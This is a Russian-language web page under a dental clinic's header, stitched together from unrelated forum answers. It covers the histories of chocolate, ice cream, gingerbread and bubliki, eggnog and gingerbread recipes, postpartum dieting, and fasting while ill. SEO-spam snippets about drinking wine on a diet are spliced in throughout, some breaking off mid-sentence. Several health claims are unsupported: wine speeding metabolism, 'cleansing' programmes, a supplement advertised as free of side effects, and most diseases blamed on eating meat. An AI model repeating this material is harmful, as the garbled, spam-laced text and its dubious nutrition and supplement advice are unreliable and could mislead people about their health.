Кафедра челюстно лицевой хирургии и стоматологии СамГМУ

ОАО "Поволжский Специализированный Реабилитационный Стоматологический Центр"
Терапия Ортопедия Пародонтология Хирургия Ортодонтия Имплантология Эстетическая хирургия ЧЛХ
  ?>
О компании
Услуги
Прайс
Наши разработки
Наш коллектив
Бесплатная
   консультация

Что же это такое? История создания, когда и где появилось это лакомство?

Шоколад

Девочки, подскажите можно ли пить алкоголь при диете? Неделю сижу на яичной диете, сегодня день рождение у друга, не знаю что лучше пить сухое вино или водку?

Может быть это напиток какао? помнится где-то читала, что в начале в него добавляли острый перец и соль.

Мароженное!!!. ой а вот откуда знаю непомню побежала инфо читать и выкладывать!

Мороженное

Может быть это леденец. Или печенье.

Это какао
Жители доколумбовой Америки едва ли не обожествляли какао. Ацтеки называли его kakauatl (“горькая вода” - это слово позже трансформировалось в “какао”) и верили, что получили драгоценные какао-бобы от великого бога Кецалькоатля (который, кстати, даровал им ещё и маис) . А у индейцев киче покровительницей какао-бобов считалась богиня Шкакау («подательница какао») .
Первыми европейцами, увидевшими какао-бобы, были Христофор Колумб и его команда: в 1502 году, во время своего четвертого похода они захватили каноэ с грузом странных «орехов» . Тогда испанцы еще не поняли, с каким богатством встретились: вожделенное ими золото для ацтеков было дешевым металлом и не кружило им голову, а вот мерой богатства и платежным средством были как раз какао-бобы (кстати, на полуострове Юкатан они служили разменной монетой вплоть до середины XIX века) .
В 1519 году бородатый испанский генерал Эрнандо Кортес высадился на побережье Мексики, и ацтеки сочли его воплощением возвратившегося к ним доброго бога Кецалькоатля, которого всегда изображали с бородой. На приеме, устроенном в честь дорогих гостей, вождь ацтеков Монтесума угощал испанцев густым напитком из какао-бобов с ванилью, жгучим перцем и специями, который подавали в чашах из чистого золота. Этот напиток ацтеки называли chocolatl («пенная вода» ) и верили, что мужчинам он придает силу, в том числе и сексуальную, а для женщин и детей весьма опасен. От ацтекского chocolatl произошло испанское (а потом и общеевропейское) chocolate — «шоколад» .
В 1527 году вернувшийся на родину Кортес привез с собой не только бобы какао, но и способ приготовления волшебного напитка. Со временем испанцы приспособили его к своим вкусам: добавили сахар и стали подавать горячим. Получился напиток, который мы сейчас знаем как «горячий шоколад» . Его готовили специальном сосуде — с коротким носиком, длинной деревянной ручкой и крышкой с отверстием для сбивалки, дабы хорошенько его вспенить. Шоколадный напиток был густым и очень жирным — на его поверхности плавала пленка масла, которую приходилось снимать ложкой.

Что можно пить на диете. Однако красное сухое вино как раз способствует ускорению обмена и содержит энзимы, помогающие переваривать жирную пищу. Поэтому бокал красного вина диету не испортит, так как содержит всего 80 ккал на 100 мл.

Гоголь-моголь «по-голландски» называется «Адвокат» , и готовят его с добавлением коньяка следующим образом. Сначала желток взбивают с солью и сахаром до образования густой смеси лимонного цвета, затем добавляют коньяк и ставят эту массу на водяную баню. Коктейль готовят на медленном огне, осторожно помешивая, главное – не перегреть, напиток должен быть теплым, а не горячим. После снятия с водяной бани необходимо добавить ваниль, а затем сделать «шапочку» из сливок. И превращается, таким образом, коктейль в десерт, который не пьют, а едят ложечкой.
Немалый интерес вызывает история появление этого коктейля на свет. Название его происходит от нижненемецкого выражения Kuddel-muddel. Считается, что гоголь-моголь придумал кондитер Манфред Кёкенбауэр во время экспериментов по консервированию сладостей, а патент на его массовое производство приобрел один известный пищевой концерн за полтора миллиона марок.
Но, уйдя вглубь истории, можно узнать, что существует легенда, которая гласит, что более ста лет тому назад придумал этот напиток кантор синагоги Гогель из Могилева, который из-за потери голоса лишился своей работы. В поисках средства, которое могло бы вернуть ему голос, Гогель придумал рецепт, который заключался в следующем: «взять сыру яичку и кокнуть в кружку, покрошить хлеба, посолить и взболтать» .
Древний рецепт в наши дни приобрел сладкую окраску и запах пряностей, и готовить коктейль можно по любому поводу, а я желаю вам никогда не терять голоса, и пить этот коктейль только в целях разнообразия меню и поднятия настроения.
ВАРИАНТ N1.
Слегка взбить 1 яйцо, добавить 1 ст. ложку вина (сорт не указан) , немного соли; все это тщательно перемешать, влить 3/4 стакана молока и процедить. Вместо вина можно добавить немного тертого мускатного ореха.
ВАРИАНТ N2.
Взбить 1 яичный желток, добавить 1 ст. ложку сахара, немного соли, 2 ст. ложки вина и 2/3 стакана молока. Все это перемешать, процедить и соединить со взбитым яичным белком. Перед подачей на стол еще раз перемешать.
ВАРИАНТ N3.
Смешать 1 яичный желток, 1 ст. ложку сахара, немного соли и ванилина, влить 3/4 стакана молока, снова перемешать и процедить.
ВАРИАНТ N4. ФРУКТОВЫЙ ГОГОЛЬ-МОГОЛЬ.
Взбить 2 яичных желтка до образования густой массы лимонного цвета, добавить немного соли, 3 ст. ложки сахара и 1/2 стакана земляничного или вишневого сока. Все это хорошо размешать, влить в 2 стакана холодного молока и 1/2 стакана холодной воды. Подготовленную смесь слить в яичные белки, предварительно взбитые в крутую пену, разлить в бокалы и посыпать сверху натертым мускатным орехом
ВАРИАНТ N5. МЕДОВЫЙ ГОГОЛЬ-МОГОЛЬ.
1 яйцо, 2 стакана холодного молока, 6 ст. ложек меда, 2 ст. ложки лимонного или апельсинового сока смешать и взбивать до получения однородной массы. Подать к столу в очень холодном виде.
Если желательно получить сладкий гоголь-моголь, то белки вместе с сахаром надо взбить до густоты и влить в смесь с желтком или положить в стакан сверху.

Когда мы совершали круиз по Волге, останавливались в Городце, что в Нижегородской губернии. Городец славен своими пряниками. Все покупали пряники, а я купил пряничную доску. Вот такую, то ли жар – птица, то ли петух. И ни минуты об этом не пожалел.
Кстати, на сайте http://www.cooking-book.ru/library/bake/prjandosk.shtmlя обнаружил статью Г. Федотова «Пряничные доски» , в которой есть такая иллюстрация пряничной доски.
Значит, моя доска имеет свои исторические корни! И с ней очень красивые пряники печатные получаются.
Рецепт пряничного теста :
3 стакана муки, 1 стакан меда, 50 г масла (можно растительного) или маргарина, ? чайной ложки соды, 2 яйца, ? чайной ложки пряностей, 2 столовых ложки сметаны.
1 стакан меда растопить на водяной бане, довести до температуры 70-80 С, всыпать специи (корица, гвоздика, кардамон, имбирь, мускатный орех, душистый молотый перец) . Всыпать половину муки, пряности, масло, и быстро перемешать деревянной лопаткой или крепкой ложкой. Если, насыпав муку в горячий мед, оставить ее на 1 – 2 минуты неразмешанной, то образуются комки, которые будет трудно размешать.
Замешанное тесто остудить до комнатной температуры, добавить яйца, соду сметану и остатки муки и месить до тех пор, пока не получится тесто мягкой консистенции. Как пластилин. Для получения нужной консистенции муку надо подмешивать постепенно.
Далее скалкой его нужно накатать на пряничную доску. Доску надо щедро смазать растительным маслом, а то тесто не будет отлепляться от нее. После обкатки удаляем остатки теста с доски, переворачиваем сырой пряник на смазанный маслом противень.
Сажаем в духовку и печем 20 -30 мин при температуре 180 – 200 градусов.
А пряник, вынутый из духовки, нужно остудить, и покрыть глазурью.
Глазурь. Берем чайный стакан сахарной пудры, растворяем его в 3 столовых ложках воды, нагреваем до 40 градусов, и смазываем пряник. Сверху можно посыпать кондитерскими украшениями.
И вот пряник готов! Красив на вид, и хорош на вкус!
Пряничная доска. Первая половина XIX века. Исторический музей. Москва

Может это попкорн?

История шоколада началась очень давно. Примерно 1500 лет до нашей эры в низменностях на берегу Мексиканского залива в Америке возникла цивилизация ольмеков. От их культуры осталось очень мало, но некоторые лингвисты полагают, что слово "какао" впервые прозвучало как "kakawa" примерно 1000 лет до нашей эры, в эпоху расцвета цивилизации ольмеков.
Майя придавали большое значение какао. Шоколад пили во время ритуалов как священный напиток. В пантеоне богов майя был бог какао. Майя разбили первые известные нам плантации какао. У них были хорошо разработаны методы приготовления шоколадных напитков разных видов с использованием всяческих добавок и компонентов - от гвоздики до перца. Сахара индейцы вообще не знали.
Какао-бобы были символом богатства и власти. Напиток из шоколадных бобов могла позволить себе лишь элита. Сами шоколадные бобы использовали вместо денег. Раба можно было приобрести за 100 бобов.

Ну конечно же - это знакомые с детства (моего во всяком случае) Кукурузные хлопья или как "модно"называть американизировано- поп-корн.

Что можно пить? Лучшим алкогольным напитком уже очень давно признано натуральное вино, произведенное из красного винограда.Ведь даже больным простудными заболеваниями рекомендуется выпивать в день пару ложек теплого красного вина. Алкогольная диета.

История мороженого началась давно: уже 3 тысячи лет назад в домах богатых китайцев подавали в качестве изысканного десерта сладкий сок свежих фруктов, смешанный со снегом или льдом. Таким же угощением потчевали Александра Македонского во время походов в Персию и Индию. Гиппократ писал, что это лакомство «излечивает вялость» .
Потом мороженое покорило Европу – благодаря прославленному венецианскому путешественнику Марко Поло, который привез рецепт охлажденного шербета из Китая. В Италии оно быстро стало излюбленным кушаньем в знатных домах. Впоследствии мороженое научились готовить круглый год, в него стали добавлять молоко, сливки, сахар, ароматические вещества и даже цветы.
Настоящее сливочное мороженое изобрели при Наполеоне III. Знаменитый пломбир тоже родом из Франции – он получил свое название по своему «месту рождения» - городу Плобьер-Ле-Бем.
Страсть к мороженому переняли немцы и австрийцы. Именно уроженцам Австрии принадлежит идея создания шоколадного мороженого. Итальянцы, великие любители смешивать самые невероятные продукты, придумали мороженое-ассорти – с добавками фруктов, орехов, ликера и кусочков печенья.
В Америку рецепты изготовления мороженого попали с английскими переселенцами. Широкое распространение оно получило в XIX веке, когда были изобретены холодильные машины, разработаны способы получения и хранения льда. В то же время английский изобретатель Томас Мастерс изобрел машину для мороженого.
В 1904 году в городе Сент-Луис проходила международная выставка мороженого, на которой демонстрировался первый автомат для выпуска вафельных стаканчиков. Так появилось мороженое в стаканчиках, называемое «пирожок эскимоса» . Спустя 4 года стали выпускать мороженое на палочке.
В России издавна существовали свои рецепты мороженого. Еще в Киевской Руси подавали к столу мелко наструганное замороженное молоко. Мороженое, в классическом понимании этого слова, пришло в Россию из Франции и прочно обосновалось в меню российской знати. Книги по кулинарии тех времен содержат различные рецепты приготовления этого лакомства. Например, рецепт земляничного мороженого можно найти в оригинальной книге «Старинная русская хозяйка, ключница и стряпуха» , изданной в 1794 году в Санкт-Петербурге.
Сегодня мороженое вырабатывают почти во всех странах мира. Рецептура его может быть очень сложной: ведь компонентов, используемых в производстве продукта, более 200.
По составу оно бывает: Второй показатель качества – степень взбитости мороженого. Если она низкая, то морожное имеет неприятную ледяную структуру, быстро тает и приобретает снежный налет.
Еще одно направление – создание новых диетических сортов мороженого. К ним относятся низкокалорийные сорта с пониженным содержанием жиров, сахара, обогащенные минеральными и витаминными комплексами

Это пряники. Первые пряники на Руси, назывались “медовым хлебом” и появились еще около IX века, они представляли собой смесь ржаной муки с медом и ягодным соком, причем мед в них составлял почти половину от всех других ингредиентов. Позже в “медовый хлеб” стали добавлять лесные травы и коренья, а в XII - XIII веках, когда на Руси начали появляться экзотические пряности, приведенные из Индии и Ближнего Востока, пряник получил свое название и практически окончательно оформился в то лакомство, которое известно нам.
В России существовало три вида пряников, получивших свое название по технологии их производства. Это лепной пряник (их лепят из теста, так же как игрушки из глины) , печатный пряник (их делают с помощью пряничной доски, или “пряницы”, в виде рельефного оттиска на тесте) и силуэтный (вырубной или вырезной) пряник (для их изготовления используется или картонный шаблон, или штамп из жестяной полоски, с помощью которых из раскатанного теста вырезается силуэт будущего пряника) .
Здесь рецепт и фото пряников, которые я пекла сама http://ru.geniuscook.com/deserty/recept-medovyh-prjanikov-s-klubnichnym-dzhemom/
Действительно за границей таких изделий нет, это характерное русское лакомство.

И это - наше с вами любимые ПЕЧЕНЬЯ . Все мы с детства любим сладости, кондитерские изделия, а особенно печенье. И даже став уже взрослыми и состоятельными людьми, мы с удовольствием можем побаловать себя любимым вкусом печенья. Ведь именно печенье переносит нас в мир детства.
История печенья
Печенье в рационе человека появилось практически одновременно с хлебом – примерно 10 тыс. лет до н. э. Можно сказать, что история печенья – это кулинарная история человечества, так как печенье в рационе человека появилось практически одновременно с хлебом. Первое печенье отличалось от тех, которое мы привыкли употреблять в нашей повседневной жизни. Оно было несладкое - сахар появился гораздо позже и до того времени вкус печенья был не самым приятным.
Сегодня сахар является неотъемлемым ингредиентом в рецептах приготовления любых кондитерских изделий, в том числе и печенья. А ведь когда-то европейцы не знали ни сахара, ни какао-бобов.
Достоинства сахара открыли для себя индийцы: его производство из сахарного тростника зародилось еще в древней Индии, и именно из древнеиндийского наречия – санскрита – слово «саккара» впоследствии перекочевало во все европейские языки. Сахарный тростник выращивался в основном на территориях, принадлежавших Британской империи, поэтому и производство сахара, и торговля им долгое время оставались в руках Англии. Сахарный тростник, поставляемый в Европу, стал сырьем для изготовления сахара. Так у печенья постепенно появился сладкий вкус.
Готовили печенье из разных видов муки. Народы проживавшие в Европе изготовляли печенья из пшеничной муки, на Востоке для этого использовали муку из риса. Уже позднее люди начали использовать для приготовления печенья овсяную, кукурузную и другие виды муки.
Торговля, путешествия, многочисленные войны, происходившие на протяжении прошлых столетий – все это способствовало обмену рецептами печенья между разными народами.
Печенье - лакомство, которое уже давно заняло свое место на нашем столе. С момента появления печенья его ассортимент постоянно прогрессировал. В настоящее время невозможно подсчитать все существующие виды этого кулинарного лакомства.
С тех пор нашему вниманию предложен огромный выбор разнообразных сортов этого лакомства, что позволяет нам выбрать печенье, согласно нашему желанию и настроению. Каждый может без труда найти печенье себе по вкусу.
Сейчас совершенно невозможно определить точное количество видов печенья. Они отличаются и по составу теста, из которого они выпечены, и по видам начинок, глазури, склеек, наполнителей, а также по форме и цвету.

Я думаю, что это пряник.
...О том, когда и как появился пряник на Руси, споры ведутся до сих пор. Так же как и о том, что же означает само слово, в котором словно застыла память о временах, когда корабли отправлялись за тридевять морей в тридесятое царство за пряностями редкими.
Бытовало мнение, что пряник известен на Руси еще с былинных времен. Так считал, например, известный собиратель и знаток русских древностей XIX века Голышев, который в подтверждение ссылается на текст одной русской сказки: "Учали богатыри есть пряники печатные; запивать их винами заморскими".
История русского пряника действительно уходит в языческие времена раннего средневековья, когда восточные славяне, освоив земледелие, стали заменять в языческих жертвоприношениях мясо животных и птиц изделиями из зерна. Изображения домашнего скота для ритуального пиршества выпекали из теста. Э­ти обычаи просуществовали около 5 веков, и только к началу XVI века "красно украшенное" печенье потеряло культовое значение, но осталось символом небудничности, праздничности.
Начиная с XVI века пряник быстро завоевывает рынок в русских стольных и дальних городах и селах. Писцовые книги второй половины XVI века сообщают о пряничниках Новгорода, Казани, Свияжска. Не случайно появление и начало распространения пряника на Руси связано именно с XVI-XVII веками - веками Великих географических открытий. Именно тогда на рынках Европы появилось большое количество пряностей - душистого перца, корицы, имбиря, гвоздики, которые вошли компонентами в русский пряник.
Историю пряника можно сравнить с историей книги. Как вначале каждая книга изготовлялась вручную, в одном-единственном экземпляре, так и пряник на заре своего существования каждый раз был произведением оригинальным. Так как в связи с ростом спроса стали книги печатать с досок, сериями, так и пряники стали серийными, "тиражными", "печатными", - их тоже стали печатать со специальных досок.
А самые известные "печатные" пряники с давних времен выпекают в Туле. Впервые это знаменитое тульское лакомство упоминается в писцовой книге 1685-го года. Книга "Старинные производства тульского края" подтверждает: "Еще в XVII-XVIII вв. в Туле пекли и продавали "печатные" пряники, украшенные затейливыми узорами".
Особую популярность тульский пряник обрел в XIX в. Ежегодно тульские кондитеры выезжали со своим товаром на российские и заграничные ярмарки, где тульский пряник неоднократно награждался российскими и международными призами.
Основанное на многовековых традициях народного творчества пряничное искусство продолжает жить и развиваться и в наши дни.

Может это кисели. Их раньше варили из гороха и овса. История киселя берет свое начало от исконно русского деревенского блюда – овсяного киселя. В стародавние времена, при царе Горохе, кроме овсяного вкушали еще и ржаные, и пшеничные, и гороховые кисели. Тогда кисель заваривали в плотную массу и потом разрезали ножом. Злаковые приправляли разведенным медом. Гороховые сдабривали густой мясной подливкой. История о том, как в тяжелое лихолетье – в Х веке – кисель спас Бел-город от набегов кочевых племен, занесена в древнейшую русскую летопись «Повесть временных лет» .
Сладкие фруктово-ягодные кисели появились позднее, когда на Руси распространился картофель и картофельный крахмал.

Пить или не пить какой алкоголь можно при диетах?Во время диет считается каждая калория и часто стоит выбор - выпить бокал вина или немного перекусить, так как совмещение выпивки и еды приведет к перебору этих самых калорий.

Наверное, кисель или всё таки ландрин :) подсказку в студию....

Предположу, что это Казинаки.. .
хоть и восточная сладость.. . но думаю, что на западе эта сладость точно не известна

Пряники.

Ватрушки? или вареники?

Это блины!!!!

Диеты не предполагают питье алкоголя. Это уже и так стресс для организма, а тут еще и алкоголь...

Может это каша? Когда маленькой была, бабушка в кашку соль добавляла, а сама сейчас только с сахаром ем!

Может быть это наши самые обычные сушки?
Бублик (крендель, большая баранка, сушка) — кулинарное изделие, пшеничное тесто кольцом, сваренное в воде (или обработанное горячим паром) , а потом запечёное.
В зависимости от размера, влажности и мягкости полученного продукта, может носить самостоятельные названия, такие, как «сушка» .
Традиции производства баранок идут из глубин русской истории. Исстари народные гуляния, на масленицу, всегда сопровождались обильным чаепитием, когда мяса уже не ели, но готовили большое количество разнообразной выпечки. Непременным атрибутом таких чаепитий были баранки.
У славян баранки и бублики были одним из любимых лакомств перед сватовством (парень дарил девушке баранки и бублики, она должна была воспринимать это как ухаживание) .
* пресные (простые, чистые) — готовятся из пресного теста, традиционно считаются "бедным" угощением;
* с маком — перед выпеканием посыпаются кондитерским маком;
* сладкие — перед выпеканием смазываются карамелизуемой массой, обычно на основе сахара и приправ типа корицы и тмина;
* солёные сушки — перед выпеканием посыпаются крупными кристаллами соли и приправами. Получили распространение как закуска к пиву;
О бублик, созданный руками хлебопека!
Ты сделан для еды, но назначение твое высоко!
Ты с виду прост, но тайное твое строение
Сложней часов, великолепнее растения.
Тебя пошляк дрожащею рукой разламывает. Он спешит.
Ему не терпится. Его кольцо твое страшит,
И дырка знаменитая
Его томит, как тайна нераскрытая.
А мы глядим на бублик и его простейшую фигуру,
Его старинную тысячелетнюю архитектуру
Мы силимся понять. Мы вспоминаем: что же, что же,
На что это, в конце концов, похоже,
Что значат эти искривления, окружность эта, эти пятна?
Вотще! Значенье бублика нам непонятно.
Николай Олейников, 1932
Бублики
Ночь надвигается,
Фонарь качается,
Фонарь качается в ночную мглу.
А я, несчастная,
Торговка частная,
Стою и бублики здесь продаю.
Припев:
Купите бублики, горячи бублики,
Купите бублики, да поскорей.
За эти бублики
Платите рублики,
Что для республики
Всего милей.
Отец мой пьяница,
За рюмкой тянется.
А мать - уборщица (какой позор!) .
Сестра гулящая,
Тварь настоящая,
А братик маленький - карманный вор.
Припев:
Купите бублики, горячи бублики,
Купите бублики, да поскорей.
Меня, несчастную,
Торговку частную,
Да в ночь ненастную
Ты пожалей.
Инспектор с папкою,
Да с толстой папкою
Всё собирается забрать патент.
Но я одесская,
Я всем известная,
И без патента всё продам в момент.
Уже несколько веков бублики являются символом русской щедрости и гостеприимства. Когда-то их продавали на всех русских ярмарках, бублики покупали на счастье и ели в кругу семьи, чтобы мысли и поступки были добрыми.

Неужели соленые арбузы??:))

Интересный вопрос. Прочитав ответы, предположу что это глазированные сырки. Ведь их можно делать и не сладкие. Жена печет творожники с травами, перцем и чесноком и поливает чесночным соусом. И нигде такие сырки не производят.

Сырковая масса наверное. Хотя соленой ее трудно предтавить. Люблю сладкую, но не жирную. Раньше масса была намного вкуснее.

Новое исследование показало если пить красное вино каждый день, то кишечник будет работать как часы.Винные диеты. Так что французы, не представляющие обеда и ужина без пары бокалов сухого красного вина, полностью правы.

Пряники, больше нечему, правда?

Вареники!!!

Птичье молоко.
История продукта:
Работа над созданием любимых многими конфет началась в 1967 году после визита министра пищевой промышленности СССР в Чехословакию, где ему довелось попробовать аналогичную конфету. По возвращению министра из поездки на Московском «Рот-Фронте» собрали представителей всех кондитерских фабрик страны и поставили перед ними задачу сделать конфету на основе суфле.
Владивостокскую фабрику на этом слете кондитеров представляла Анна Федоровна Чулкова – в то время мастер розничного цеха. Вернувшись домой из трехдневной командировки в столицу, она возглавила процесс разработки рецептуры и технологии приготовления конфетной массы, ныне известной как «Птичье молоко» .
Работники Владивостокской фабрики лучше всех справились с поставленной задачей – они предложили наилучшую технологию приготовления этого изысканного лакомства. В первый год производства фабрика (единственная в стране) выпустила 12 тонн нового лакомства вместо 6 запланированных.
Кроме того, приморские мастера, как было принято в те годы, щедро делились своим опытом и помогали внедрять производство «Птички» на других фабриках Советского Союза. Вопреки расхожему мнению, никакого секретного рецепта у «Птички» нет, зато есть секрет мастерства – в производстве этих конфет очень многое зависит от опыта и интуиции кондитера. Ведь большинство фабрик СССР производили «Птичье молоко» по унифицированным рецептурам, но не у всех оно получалось одинаковым. Большое значение имеет и качество исходного сырья. Опыт приморских технологов позволяет и сегодня производить первоклассный продукт – спустя 40 лет «Птичка» Приморского кондитера для многих является эталоном, эти конфеты – один из самых популярных гостинцев из Владивостока.

Женщины! подскажите действенную диету для располневших после родов..

Как женщины умудряются полнеть после родов? А бессонные ночи? А молоко, которое вытягивает всё, что человек съест? Я так похудела после родов! Всё, что ем, идёт в молоко. Меня уже ноги не носили. Если за грудным дитём ухаживает няня, то мать конечно может спать и жир нагуливать.

Фильтрованную воду можно пить без ограничений. Калорийность вина всей бутылки при такой диете составит 480-495 ккал. Ещ 300-350 ккал прид тся на долю яблок.

После родов полнеют многие, но это почти в 90% случаев не болензнь. Просто во время беременности хочется всегда "чего-нибудь" и ешь это. А после родов, то нельза, на это у малыша диатезик высыпает....А полнота остаётся. Погоди когда пройдёт примерно месяц после родов и начинай есть больше каш на воде, фруктов (не цитрусовых) ну и упражнения делай (конечно если после родов не было осложнений)

Могу посоветовтаь вкусное и полезное диетичсекое питание,которое можно кушать даже комящим и беременным

Что нужно сделать - это отказаться от таких продуктов (еды) как: Животный жир, сливочное масло, сливки, сыр, молоко более1%жирности, колбасы (любой, даже докторской) , сардельки, сосиски, сало, шпик, ветчина, майонез, любое жирное мясо. Отказаться от жаренной - со шкварками пищи, от жаренных во фритюре любых продуктов. Вы спросите. А что же тогда есть? Я отвечу всё, без ограничений мясо любое постное, молочные продукты любые, но меньше 1,5% жирности, любые овощи и макаронные изделия. Приготовить все это можно на пару, в вине, на гриле, в воде (варённое) , на вертеле, в микроволновке. Недостаток жирных кислот в организме восполните растительными маслами и OMEGA 3,6,9 .
Без двигательной активности не обойтись, что бы сжечь жировые отложения надо ходить по 7 -10 км в день и следить за темпом сердцебиения, темп в среднем должен быть 110 ударов в минуту. Отследить его можно кардиодатчиком (напульсником) либо беговые дорожки в фитнес центрах снабжены такими кардиодатчиками, либо купить такой в виде часов такие есть в продаже. Естественно желательно купить шорты или штанишки "Turbo Slim" (такие резиновые) для проблемных зон. И купите себе в аптеке средство под названием "Элькар" (это L- карнитин) , пить одну чайную ложку за 30 минут до физических занятий (дозу не превышайте никогда) . Через год у вас исчезнет не менее 10 -15 кг, только не торопите себя и свой организм, липолиз (разрушение жировых отложений происходит очень медленно) , не "посадите" себе сердце, поэтому не рекомендую бегать. Успехов вам.

Сменить образ жизни. Лишний жир-это нерастраченная энергия, защита организма от стрессов в которых ваш организм живёт.
Худеть нельзя, надо любить себя такой, какая есть, очищение поможет держать организм в форме. Проблема не в весе, а глубже. Разберитесь в психологии. Почитайте Луизу Хэй Исцеляющая сила мысли. Образ жизни менять надо, тогда восстановите обмен веществ.
Диеты ущемляют организм и работают на 1/4-это стресс для организма, он потом отложит про запас. Слушать надо организм, он подскажет, какие микроэлементы ему нужны для построения клеток. Каждые 7 лет организм новый. Форму держать надо очищением. Надо слушать организм, что ему надо, после очищения вы особенно это ощутите, что управляет вами организм. Вы просто мешаете ему функционировать и не зная какие химпроцессы происходят, вмешиваетесь, организм-это космос, биохим лаборатория.
Конечно, дело не в весе, а в проблемах глубже, надо разбираться в психологии и полюбить себя. Вести здоровый образ жизни, заниматься здоровьем смолоду, чтобы старость не встретить в инвалидной коляске.
Пейте 1,5л-3л чистой живой воды, питайтесь 100% натуральной пищей, очищайтесь 2 раза в год, слушайте организм, он вам подскажет после очищения, что ему для построения клеток не хватает. Из нанотехнологий рекомендую программу очищения Коло вада, из гелецевтики-ноу хау -
Agel FIT поможет Вам в неустанной борьбе под девизом "меньше есть и больше двигаться", которая необходима для избавления от лишнего веса и поддержания отличной формы. Что еще замечательно – FIT не вызывает никаких побочных эффектов, в отличие от стимуляторов.
Он содержит натуральный активный ингредиент, называемый Super CitriMax – запатентованную форму гидроксицитриновой кислоты (HCA), которая производится из экстрактов плодов и кожуры гарцинии камбоджийской. Ее основной функцией является предотвращение скопления в Вашем организме неиспользованных углеводов.

Я похудела как ребенок ходить начал.И вот уже год держу один вес.

Давайте разберемся, можно ли совмещать диету Дюкана и алкоголь.На третьем этапе диеты Дюкана уже разрешается два раза в неделю выпивать бокал вина или шампанского. Если вы выпили вино, в этот же день откажитесь от сладкого

Вопрос верующим: можно ли поститься больному желудком человеку?

Если врач разрешает, то можно
--------------
полное? не берите на себя больше чем можете вынести: ) бессмысленно и приведет к унынию)))) такие "подвиги" никому не нужны

Также хорошими напитками для диеты являются фруктовые чаи, каркаде, травяные чаи. Для расслабления можно пить душицу, мяту, чабрец.Вино стоит употреблять только сухое, в нем есть все нужные микроэлементы и витамины. Напитки, снижающие аппетит Уменьшить...

Больному головой все можно...

У врача надо спрашивать.
Полное воздержание -24 часа ?

Не есть мясо, рыбу, яйца и прочие продукты убийства можно и нужно всем. Большинство болезней -как раз от поедания трупной пищи.
А полное воздержание от пищи, может быть проблематично, если больной желудок.

В полном воздержании от пищи и воды нет необходимости. Больные, беременные, кормящие и малые дети могут не поститься. А так, насколько я знаю, при больном желудке своя специальная диета, очень ограниченная и похожая на пост. Если из нее исключить некоторые продукты, то наверное можно, все зависит от самочувствия. Главное поститься душой!

Надо операцию делать а не поститься.

Какое вино можно пить при диете. Также диетологи настаивают на том, 2 порции в день надо съесть без приправ и соли.Прежде чем сесть на диету Какое вино можно пить при диете , посоветуйтесь с врачом!

Спаситель заповедал ученикам пост..., когда Он будет взят от них...

Вообще, пост любой по благословению держат. Вопрос нужно духовнику задавать.

А как же испытания, что посылает нам Господь? Терпеть и только терпеть, хоть здохни, но терпеть.

Бог нас хочет видеть здоровыми, сытыми и счастливыми! Он нас так задумал, а все остальное мы придумали...

Вы неправильно понимаете значение поста. Никогда нельзя постится со вредом для здоровья. Пост подразумевает смирение, и ограничение себя в духовной и телесной жизни. В первую очередь надо избегать греховной жизни, чаще ходить в храм, читать полное молитвенное правило. Если от обычной еды вам нельзя отказаться, то откажитесь от лакомства. Сходите в храм поговорите со священником!!!

Какие фрукты можно при диете? Фруктовая диета выводит из организма человека, все токсины и шлаки.Кроме воды, можно пить несладкие зеленые чаи, нежирные молочные коктейли и свежевыжатые соки.

Пост допускается в соответствии с состоянием здоровья.
Ни один священник не навязывает пост, если человек имеет слабое здоровье. Главное - не еда и не отказ от нее.
Полное воздержание от пищи и воды. - это голодовка, а не пост

Да ни одна религия этого не требует!!! !
Всегда есть послабление поста беременным, детям,
И УЖ ТЕМ БОЛЕЕ БОЛЬНЫМ!! !
Детям, например от конфет воздерживатся советуют.
А больным, так не отчего!! !
Пост это не пытка и издевательство, а на пользу должно идти!! !
И душе и телу!!!

Чтобы не впасть в гордыню побеседуйте со своим духовником на эту тему или посетите храм, монастырь и там побеседуйте ...

У людей с больным желудком неможет быть нарушения диеты, раввины всегда спониманием относится к таким проблемам. Полное воздержание которое может вызвать обострение болезни никому не нужно.

Пост-это не обязательство, к которому Вас кто-то принуждает, а для определенной цели, например "Этот же род изгоняется только молитвою и постом", Мф. 17:21. Так что пост без молитвы бессмыслен. Также Господь не требует, чтобы мы вредили своему здоровью, а апостол Павел вообще пишет Тимофею, у которого были проблемы со здоровьем: "Впредь пей не одну воду, но употребляй немного вина, ради желудка твоего и частых твоих недугов", 1Тим., 5:23.

Дилетант не всегда способен адекватно оценить ту или иную диету. Для вычисления его необходимо разделить массу тела на рост в метрах в квадрате. Единственное, необходимо правильно выбирать продукты, которые вы употребляете в пищу.

Если пост может навредить ему и ухудшить состояние его здоровья, то он не имеет право поститься, так как всевышний сказал «Не убивайте самих себя, ведь Аллах милостив к вам. » Коран, [4:29]
Больным можно не поститься, это льгота от Аллаха и Аллах любит, когда пользуются его льготами, но имеете право кормить за каждый пропущенный день поста одного голодного.
http://www.waytoquran.net/cgi-bin/e-cms/vis/vis.pl?s=001&p=0034&n=000008&g =

По закону Бога, данному через Моисея, нужно было поститься лишь в ежегодный день искупления. Закон требовал, чтобы в этот день израильтяне ‘смиряли души свои’, то есть постились. Но поститься следовало не для того, чтобы соблюсти формальность. Соблюдение дня искупления побуждало народ Израиля к большему осознанию своей греховности и необходимости искупления. Они постились в этот день также для того, чтобы выразить сожаление о своих грехах и раскаяние перед Богом. Это был единственный обязательный пост, который требовался по Моисееву закону. Хотя Иисус Христос никогда не повелевал своим ученикам поститься, сам он и его ученики постились в день искупления, потому что следовали Моисееву закону. Кроме того, некоторые ученики Иисуса постились добровольно и по другим случаям, так как Иисус не запретил им поститься вообще (Деяния 13:2, 3; 14:23). Однако им нельзя было ‘принимать на себя мрачные лица, чтобы показаться людям постящимися’ (Матфея 6:16). Внешняя набожность могла вызвать восхищение и одобрение людей. Но Бог не одобрял дел напоказ (Матфея 6:17, 18).
Правда, Иисус сказал, что его последователи будут поститься по случаю его смерти. Но, говоря это, он не учреждал ритуального поста. Скорее он просто указал на реакцию своих учеников — глубокое горе, которое им предстояло пережить. После воскресения он вновь соединился с ними, и причина для поста отпала (Луки 5:34, 35).
Моисеев закон утратил свою силу, когда ‘Христос, однажды принес Себя в жертву, чтобы подъять грехи многих’ (Евреям 9:24—28). И с упразднением Закона утратило свою силу и повеление поститься в день искупления. Так был отменен единственный обязательный пост, упомянутый в Библии.

Нет больные освобождаются от поста
когда выздоровит возместит пропущенные дни поста
подробнее есть в сообществе muzikislam
mir vam

Если он не имеет сил и здоровья то ему прощается. он может не постится ведь Аллах лучше знает когда мы обманываем.

